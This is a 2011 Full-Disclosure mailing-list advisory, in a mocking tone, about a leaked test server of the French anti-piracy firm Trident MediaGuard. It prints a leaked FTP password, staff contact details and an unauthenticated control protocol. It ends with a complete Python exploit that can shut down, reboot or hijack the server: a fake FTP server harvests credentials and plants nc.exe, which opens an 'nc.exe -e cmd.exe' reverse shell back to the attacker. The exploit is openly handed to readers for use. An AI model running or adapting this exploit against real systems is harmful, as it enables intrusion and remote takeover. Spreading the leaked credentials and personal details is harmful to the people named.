TMG Leak

# Received: by 10.229.245.65 with HTTP; Fri, 20 May 2011 11:59:38 -0700 (PDT)
# Date: Fri, 20 May 2011 20:59:38 +0200
# Message-ID: <BANLkTi=gXd7qCEGpnjvfOM-_xJRh3TAfwQ AT mail.gmail.com>
# From: "cult.of.the.dead.hadopi.tmg cult.of.the.dead.hadopi.tmg"
#   <cult.of.the.dead.hadopi.tmg AT gmail.com>
# To: full-disclosure AT lists.grok.org.uk
# X-Mailman-Approved-At: Fri, 20 May 2011 20:13:30 +0100
# Subject: [Full-disclosure] Too Many Gremlins for Trident MediaGuard (HADOPI)
# Content-Type: text/plain; charset="iso-8859-1"
# Content-Transfer-Encoding: quoted-printable


# From: cult.of.the.dead.hadopi.tmg <cult.of.the.dead.hadopi.tmg AT gmail.com>
# To: full-disclosure AT lists.grok.org.uk
# Date: 05/20/2011 08:59 PM
# Subject: [Full-disclosure] Too Many Gremlins for Trident MediaGuard (HADOPI)

Click "RAW" to remove formatting: http://pastebin.com/raw.php?i=br0BzhJG


# -- TOP SECRET -- TOP SECRET -- TOP SECRET -- TOP SECRET -- TOP SECRET --


#                  --==[ CULT OF THE DEAD HADOPI ]==--
#                             Advisory 2


# The HADOPI law or Creation and Internet law (French: Loi favorisant la
#    diffusion et la protection de la création sur Internet, "law
#   promoting the distribution and protection of creative works on the
#    internet") is a French law introduced during 2009, attempting to
#      control and regulate internet access as a means to encourage
#   compliance with copyright laws. "HADOPI" is the government agency
#                     created by the eponymous law.

#               http://en.wikipedia.org/wiki/HADOPI_law


# In  a previous  advisory, we  exposed the  secret plan  of  the French
# government to take  over the Internet using a  patriotic botnet. A few
# days after the strategy was exposed, the piece of software was removed
# by Orange. No more Internet by Orange...

# Now, the cult of the dead HADOPI is proud to announce his new advisory
# (free copy, quote it as much as you want, no tax to be paid):

#                           Too Many Gremlins
#                                  for
#                           Trident MediaGuard


# After such  a big failure at  creating a patriotic  botnet, the French
# government  is trying to  build a  new army  with strong  and reliable
# soldiers: Gremlins.

# They subcontracted  with a private company  called Trident MediaGuard.
# This  company is  as  concealed as  Bin  Laden in  the  middle of  the
# Pakistan.  It is the long arm  of the HADOPI and the French government
# for  everything related  to 3  strikes  laws. Note  that they  recruit
# people all over Europe at least. Fear the Gremlins.

# But they fucked everything up as DSK.


# Who are they?

# Trident Media Guard (TMG) is a French company specialized in software
# to prevent unauthorized copying of files over the Internet. Founded in
#      2002 by Alain Guislain and Bastien Casalta, it is located in
#                 Saint-Sébastien-sur-Loire near Nantes.

#   It aims to "provide services to major publishing companies of the
# recording and film industry to stop the loss of revenue due to illegal
#                  downloads on peer-to-peer networks."

#            http://en.wikipedia.org/wiki/Trident_Media_Guard
#  http://www.societe.com/societe/trident-media-guar-sa-441392586.html


# You have to read to the end to learn how to pwn the Gremlins!


# Never expose the Mogwai to bright lights *****************

# During a  few days around the  14th-15th of may 2011,  a "test server"
# (according to Too Many Gremlins spokeman) was exposed on the Internet.
# It was supposed to be used for R&D only.

# This server  (91.189.104.82) gave some  files revealing what  Too Many
# Gremlins is filtering, and how they are working.

# You can retrieve all the files here: http://pastebin.com/Rc1zGXu0

# They should remember it is better  to close the door before going into
# the bathroom. You never know, a maid could come in.


# Never trust 91.189.104.0 - 91.189.111.255 -------------------------------


# When you look for information about 91.189.104.82, you discover it belongs to:

# $ whois 91.189.104.82
# Inetnum:        91.189.104.0 - 91.189.111.255
# netname:        FARM04
# descr:          Trident Mediguard
# country:        FR
# org:            ORG-TA253-RIPE
# admin-c:        CB1756-RIPE
# tech-c:         CB1756-RIPE

# person:       Casalta Bastien
# address:      Trident Mediguard
#               13 rue de la Tour d'Auvergne
#               44200 Nantes
#               FR
# phone:        +33 2 40 12 00 97
# fax-no:       +33 2 40 35 36 79
# e-mail:       casalta@mediaguard.info
# nic-hdl:      CB1756-RIPE

# route:          91.189.104.0/21
# descr:          Trident Mediguard
# origin:         AS174
# mnt-by:         COGENT-ROUTE-MNT


# Gremlins, especially French ones, are horny and tend to reproduce very
# quickly. They need at least a /21!

# So, if  you don't want gremlins to  get you, just ban  these IPs.  Hmmm
# maybe they noticed people already do that. So maybe now they are using
# the same  tricks every one does to  bypass the 3 strikes  law: using a
# VPN

# On a side note, quite  funny:
# $  host  mediaguard.info
# mediaguard.info  has  address 212.53.95.124
# mediaguard.info mail is handled by 10 smtp99.nagra.com.

# WTF is mediaguard doing with Nagra!


# Back to the future  -------------------------------

# Gremlins  can look so  nice, so  sweat, so  kind especially  when they
# promise  to  government:  Sir,  yes  Sir, all  privacy  will  be  kept
# secret. We care about privacy, security,  we really do, as long as you
# pay us.

# But of  course, leaks happen, like  in 2007 with  Media Defender (just
# google for "mediadefender email leak")

# Then,  you  could  find  emails  from Bastien  Casalta,  asking  Media
# Defender not to block some IP ranges:

#   From: Bastien Casalta
#   To: Ben Grodsky
#   Sent: Thu Aug 30 01:01:56 2007
#   Subject: IP Blocks

#   Hello Ben,

#   - you can ignore the following ip blocks:
#     82.138.81.0 /24
#     82.138.88.0 /22
#     91.189.104.0 /21
#     130.117.41.0 /24
#     130.117.115.128 /25

#   Best,

#     Bastien

#   TMG
#   13, rue de la Loire - Bât D
#   44230 St Sébastien Sur Loire
#   Tel 02 40 12 00 97
#   Fax 02 40 35 36 79
#   contact_at_tmg.eu


# It  seems the  range  where the  leak  of the  so  called test  server
# 91.189.104.82 happens  already belong to  the Gremlins in  2007. Maybe
# you also want to ban these ranges too.

# BTW, you want to get in  touch with Bastien Casalta, use the proper
# email: casalta(at)tmg.eu


# Gimme money ------------------------------

# French politics can be very perv  (yes, DSK is not the only one). They
# succeed  in  taking  taxes  from  people and  give  it  to  innovative
# company. In 2005,  Too Many Gremlins get 40.000  Euro from an official
# agency supposed to help "innovative companies".

# You see, all French are perverse: they pay taxes to get big brothered.

# http://www.reseau-entreprendre-atlantique.fr/reseau-entreprendre-atlantique/fr/s04_laureats/s04p03_fiche_laureat.php?laureat=1897


# Patents ------------------------------

# The gremlins are  very possessive. As such, they  try to protect their
# "precious". And  nowadays, you  don't have to  hide for centuries  in a
# cave: you patent your idea!


# * http://www.faqs.org/patents/app/20090210492

#   Patent application title: METHOD FOR COMBATTING THE ILLICIT
#   DISTRIBUTION OF PROTECTED MATERIAL AND COMPUTER SYSTEM FOR CARRYING
#   OUT SAID METHOD

#   Inventors: Alain Guislain (St. Sebastien Sur Loire, FR) Bastien
#     Casalta (Nantes, FR) Soufiane Rouibia (Nantes, FR)
#   IPC8 Class: AG06F1516FI
#   USPC Class: 709204
#   Publication date: 08/20/2009
#   Patent application number: 20090210492

#   Abstract:

#     The invention relates to a  method for hindering or preventing the
#     illegal distribution  of protected data in  a peer-to-peer network
#     comprising  at  least one  peer  operating  an exchange  programme
#     designed for distribution of data to at least one client according
#     to a selective exchange protocol  permitting the peer to operate a
#     selection  of  clients to  which  the  data  is transferred,  said
#     selection  being  carried  out  as  a  function  of  one  or  more
#     characteristics of the clients. In  said method bogus data is sent
#     to the peer  such as to influence the  selection of clients served
#     by the peer, such that the  peer is made to favour the transfer to
#     authorised clients.


# * http://www.faqs.org/patents/app/20100036935

#   Patent application title: METHOD FOR REACTING TO THE BROADCAST OF A
#   FILE IN A P2P NETWORK

#   Inventors:  Bastien Casalta (Nantes, FR)  Soufiane Rouibia (Nantes, FR)
#   IPC8 Class: AG06F1516FI
#   USPC Class: 709219
#   Publication date: 02/11/2010
#   Patent application number: 20100036935

#   Abstract:

#     A method for establishing connections  with a number of peers of a
#     peer  to  peer  network  operating  using at  least  one  exchange
#     protocol, such  as to influence the  broadcast of a  file within a
#     peer to peer  network, the addresses of the  number of peers being
#     held by at  least one network server. A  connection is established
#     with the network server such as to at least partially download the
#     addresses  of the  number of  peers connected  to the  network and
#     implicated in  the downloading of  the file, to a  control server,
#     then  connections are  established  between at  least one  control
#     client  exchanging data  with  the control  server  and peers  the
#     addresses  of which have  been downloaded  to the  control server,
#     such as to download content from  a peer to a controlled client or
#     broadcast  content  from  a  controlled  client  to  a  peer,  the
#     downloading  or broadcasting  being carried  out according  to the
#     exchange protocol.


# How to contact them -----------------------------

# If you want to get in touch with the Gremlins leaders:
#   * Alain Guislain, CEO
#     http://fr.linkedin.com/pub/alain-guislain/1/215/952
#   * Bastien Casalta, CTO
#     http://www.linkedin.com/profile/view?id=4004355
#   * Soufiane Rouibia, R&D manager
#     http://fr.linkedin.com/pub/soufiane-rouibia/5/684/5b8

# Or visit the empty website: http://tmg.eu


# Never get it wet *****************

# Ok, ok, it was a bit long. But you have to learn what Gremlins are to
# understand this evil power. Let us have a look now at what was on that
# server.


# A list of names --------------------------------

# In the server_interface.exe, the  Gremlins are spreading. You can find
# a list of ... we don't know what yet. You can easily find it everywhere
# on  the  Internet  now.  Just  look for  KingElvis,  jay@yahoo.se  and
# melon_foli, you will find the list.

THE LIST: http://pastebin.com/xBFzK9Ce

# Here, we are very disappointed: we can not determine what is this list
# for :(

# Are these the names of the Gremlins? Or nicks of the humans they ate?
# No way to know.


# Save your FTP password on the server itself ------------------------

# No need to comment here...

# 91.189.104.82/test/script>> cat cmd_auto_update_cmd_file.txt
# share
# hFd38+1E
# prompt
# pasv
# mget "script/script_diff2/execute_update.bat"
# mget "script/script_diff2/cmd_execute_update_cmd_file.txt"


# Oh yes!

# Just   in  case   they  erase   the  above   file,  it   is   also  in
# cmd_update_cmd_file.txt.

# Remember, the Gremlins are supposed to protect your private data.


# Never feed it after midnight *****************

# Too Many Gremlins is an  innovative company. Let us see how innovative
# is the way  the develop, and as such the way  they protect the private
# data they gather.

# Among files they shared, one  is called server_interface.exe.  It is a
# Delphi service (welcome in the 90s) listening on TCP/8500.


# Advanced features: authentication  -----------------------------

# As  they keep  stating,  Too Many  Gremlins  are on  the  edge of  the
# technology. The patents show how true  it is. Sadly, we could not find
# their patent  on authentication ... maybe  because you do  not need to
# authenticate!

# Anyone can connect to this server and send commands. :)

# This is called sharing, isn't-it ?


# Advanced feature: protocol design ----------------------------

# The protocol is very simple:


#   - first four bytes must be \x15\x66\x00\x78
#   - the next byte determines the command:
#     - \x65: shutdown the computer
#     - \x66: reboot the computer
#     - \x70: execute stop_P2P_client.bat
#             - two next bytes are used as size to get the output of this script
#     - \x71: execute start_P2P_client.bat
#             - two next bytes are used as size to get the output of this script
#     - \x81: execute transfer_set.bat
#             - next double word is the IP address to download files using FTP
#             - next word is the port to use
#             - two next bytes are used as size to get the output of this script
#     - \x82: execute auto_update.bat
#             - next double word is the IP address to download files using FTP
#             - next word is the port to use
#             - two next bytes are used as size to get the output of this script

# As an  exercise, you can code  the proper Scapy  classes. Please, drop
# your submissions to http://trac.secdev.org/scapy

# Advanced features: pwn the Gremlins --------------------------

# Let us have a look at auto_update.bat used by command \x82:

# 91.189.104.82/test/script>> cat auto_update.bat
# @echo off

# echo auto_update.bat
# echo Transfering files from %1:%2, exiting in 10 sec

# if (%1 == "") exit

# echo Update cmd file
# ftp -s:"C:\script\cmd_auto_update_cmd_file.txt" %1

# execute_update.bat %1 %2

# echo auto_update.bat completed

# I think  you have spot  the problem :)  An attacker can use  the "Auto
# Update" feature (\x82) to force the server to download updates from an
# evil FTP server he controls.  Of course, a downloaded file is executed
# just after the download...

# Hence, anyone  who wants to raise  an army against  Too Many Gremlins,
# look for open bar  on TCP 8500. Here is the gift  to you from the cult
# of the dead HADOPI.

# CLICK THE "RAW" TO COPY THE CODE - http://pastebin.com/raw.php?i=br0BzhJG

# <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
# $> cat Too_Many_Greemlins_exposed_to_the_sunlight.py

#!/usr/bin/env python2
# -*- coding: utf-8 -*-

import sys
import struct
import time
import socket
from threading import Thread

#
# Change this IP to your public IP address.
#
PUBLIC_IP = "192.168.0.1"

#
# Don't forget to open ports 21 and 8501 in your
# OpenOffice.org firewall
#
SRV_PORT   = 8500
FTP_PORT   = 21
SHELL_PORT = 8501

MAGIC  = "\x15\x66\x00\x78"
HALT   = "\x65"
REBOOT = "\x66"
STOP   = "\x70\x00\x00"
UPDATE = "\x82"
OK     = "\x01"

def usage (msg = None):

  if msg: print "Error: %s\n" % msg

  print "Usage: %s IP command" % sys.argv[0]
  print
  print "commands:"
  print "- halt    shutdown the server"
  print "- reboot  reboot the server"
  print "- stop    stop P2P clients (eMule and Shareaza)"
  print "- pwn     use a vulnerability in the Auto Update feature to get a remote shell"

  sys.exit(0)

class fake_ftpd(Thread):

    def __init__ (self):
      Thread.__init__(self)
      self.s = None
      f  = open('./nc.exe', 'rb')
      nc = f.read()
      f.close()
      batch  = "@echo off\r\n"
      batch += "move cmd_execute_update_cmd_file.txt nc.exe\r\n"
      batch += "nc.exe %s %s -e cmd.exe\r\n" % (PUBLIC_IP, SHELL_PORT)
      self.files = {
        'script/script_diff2/execute_update.bat': batch,
        'script/script_diff2/cmd_execute_update_cmd_file.txt': nc
      }

    def run (self):
      self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
      self.s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
      self.s.bind(("", FTP_PORT))
      self.s.listen(1)
      self.s.listen(0x1337)
      print "[+] Waiting for FTP connection..."

      conn, addr = self.s.accept()

      print "[!] FTP - %s connected!" % addr[0]
      conn.send("220 Welcome to my FTPd - Ready to pwn you!\r\n")

      while True:
        data = conn.recv(1024)
        if not data:
          break

        args = data.rstrip().split(' ')

        if data.startswith('CWD'):
          conn.send('250 CWD command successful.\r\n')

        elif data.startswith('TYPE'):
          conn.send('200 TYPE set.\r\n')

        elif data.startswith('USER'):
          conn.send('331 Password required.\r\n')
          username = data.split(' ')[1].rstrip()

        elif data.startswith('PASS'):
          conn.send('230 User logged in.\r\n')
          password = data.split(' ')[1].rstrip()
          print "[!] TMG credentials: %s/%s" % (username, password)

        elif data.startswith('PORT'):
          arg  = args[1].split(',')
          ip   = '.'.join(arg[:4])
          port = int(arg[4]) * 256 + int(arg[5])
          sdata = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
          sdata.connect((ip, port))
          conn.send('200 PORT command successful.\r\n')

        elif data.startswith('RETR'):
          conn.send('150 Opening BINARY mode data connection\r\n')
          buf = self.files.get(args[1], 'file not found\r\n')
          sdata.send(buf)
          sdata.close()
          conn.send('226 Transfer complete\r\n')
          print "[+] File \"%s\" transfered..." % args[1]

        elif data.startswith('NLST'):
          conn.send('150 Here comes the directory listing.\r\n')
          if len(args) == 1:
            listing = ''
          else:
            listing = args[1]
          sdata.send(listing + '\r\n')
          sdata.close()
          conn.send('226 Directory send OK.\r\n')

        elif data.startswith('QUIT'):
          conn.send('221 Goodbye.\r\n')
          break

        else:
          conn.send('500 Unknown command.\r\n')

      conn.close()


def do_stuff (host, cmd):

  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.settimeout(5)

  try:
    print "[+] Connecting to %s:%d..." % (host, SRV_PORT)
    s.connect((host, SRV_PORT))

  except Exception, e:
    print("[?] Error: %s" % e)
    s.close()
    return ;

  print "[+] Sending evil packet..."

  if cmd == 'halt':
    s.send(MAGIC + HALT)
    print "[!] Done!"

  elif cmd == 'reboot':
    s.send(MAGIC + REBOOT)
    print "[!] Done!"

  elif cmd == 'stop':
    s.send(MAGIC + STOP)
    data = s.recv(1)

    if data and data[0] == OK:
      print "[!] Done!"
    else:
      print "[!] Error :("

  elif cmd == 'pwn':
    ftpd = fake_ftpd()
    ftpd.daemon = True
    ftpd.start()

    command = socket.inet_aton(PUBLIC_IP) + struct.pack("h", socket.ntohs(FTP_PORT)) + "\x00\x00"
    s.send(MAGIC + UPDATE + command)
    data = s.recv(1)

    if data and data[0] == OK:
      s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
      s2.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
      s2.bind(("", SHELL_PORT))
      s2.listen(1)

      conn, addr = s2.accept()
      print "[!] SHELL - %s connected!" % addr[0]
      print conn.recv(4096)

      while True:
        cmd = raw_input()
        if cmd == "quit" or cmd == "exit":
            break;
        conn.send(cmd + "\r\n")

        data = ""
        conn.settimeout(None)
        data = conn.recv(1024)
        conn.settimeout(1)

        while True:
            line = ""
            try:
                line = conn.recv(1024)
            except socket.timeout:
                break
            if line == "":
                break
            data += line

        tab = data.split("\n")
        print "\n".join(tab[1:-1])

      conn.close()
    else:
      print "[!] Error :("

  s.close()

if __name__ == '__main__':

  if len(sys.argv) < 3:
    usage("Not enough arguments")

  (_, host, cmd) = sys.argv

  if cmd not in ['halt', 'reboot', 'stop', 'pwn']:
    usage('Invalid command ("%s")' % cmd)

  do_stuff(host, cmd)

  sys.exit(0)

# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


# Famous last words *****************

# Whether or not this was test server, it does not matter.  It just show
# how reliable Too Many Gremlins can be.

# The piece  of software  is as  good as Orange's  one described  in our
# previous advisory. Even a kid could pwn them. Scary.

# French evil master plan agency HADOPI stated they are going to inspect
# Too Many  Gremlins in order to assess  if they are secure  now. I hope
# they also had  a look to their codes.  Oh no!   They can not.  Reverse
# engineering is mostly  illegal in France. So we  should just trust the
# Gremlins.


# Greets ******

# N. Sarkozy, Chinese fellows,  C. Albanel, F. Mitterrand J-L. Warsmann,
# F.  Riester, F.  Lefebvre,  J-L.  Masson,  J.  Myard,  M.  Thiollière,
# M. Marland-Militello


# -- TOP SECRET -- TOP SECRET -- TOP SECRET -- TOP SECRET -- TOP SECRET

# _______________________________________________
# Full-Disclosure - We believe in it.
# Hosted and sponsored by Secunia - http://secunia.com/